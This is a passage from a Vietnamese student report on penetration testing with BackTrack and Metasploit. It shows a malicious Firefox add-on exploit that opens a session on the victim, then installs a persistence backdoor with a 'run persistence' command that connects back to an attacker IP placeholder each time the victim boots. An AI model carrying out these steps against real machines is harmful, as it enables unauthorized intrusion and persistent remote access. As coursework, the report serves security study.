firefox : “set addonname [tên addon]. Đường dẫn chứa file addon đó “set uripath /” và

sử dụng exploit để bắt đầu lắng nge.

Sau khi exploit thì nó tạo ra 1 đường dẫn.

Nếu nạn nhân sử dụng firefox truy cập vào đường dẫn này và cài add on thì sẽ

có 1 kết nối đến Honeypot.

Có 1 sesions đã được mở.

Page 31: Báo cáo cuối kỳ

Đề tài: Nghiên cứu và sử dụng BackTrack để kiểm tra an ninh mạng

GVHD: Võ Đỗ Thắng Trang | 23 SVTH: Nguyễn Văn Tiến

“Sessions –i 1” để kết nối đến máy nạn nhân. Và chúng ta đã chiếm được hệ

thống của nạn nhân.

3. Backdoor

Backdoor là một chương trình được hacker cài vào máy tính nạn nhân có thể

truy cập vào thời gian sau cho dù lần xâm nhập trước đó đã bị phát hiện.

Cách thực hiện: Tạo thêm một dịch vụ mới có tên “rất hệ thống”, gỡ bỏ một

dịch vụ ít sử dụng và cài backdoor với chính tên đó.

Sauk hi chúng ta chiếm được quyền hệ thống và muốn lần sau máy nạn nhân sẽ

tự kết nối đến mà không phải tốn thời gian khai tấn công như thế nữa. Chúng ta sử

dụng backdoor có sẳn trên Metasploit là persistence.

Xem các trợ giúp của backdoor persistence bằng lệnh: “run persistence –h”

Page 32: Báo cáo cuối kỳ

Đề tài: Nghiên cứu và sử dụng BackTrack để kiểm tra an ninh mạng

GVHD: Võ Đỗ Thắng Trang | 24 SVTH: Nguyễn Văn Tiến

Tiếp theo ta thực hiện :

“run persistence –A –U -1 10 –p 443 –r [ip của attacker]

Và ta thấy có thêm 1 sessions đã được tạo ra. Ta thoát khỏi sessions.

Khi mỗi lần nạn nhân mở máy lên thì sẽ có 1 sesions mới được tạo ra.

Page 33: Báo cáo cuối kỳ

Đề tài: Nghiên cứu và sử dụng BackTrack để kiểm tra an ninh mạng

GVHD: Võ Đỗ Thắng Trang | 25 SVTH: Nguyễn Văn Tiến

Bây giờ ta có thể khai thác trên máy nạn nhân.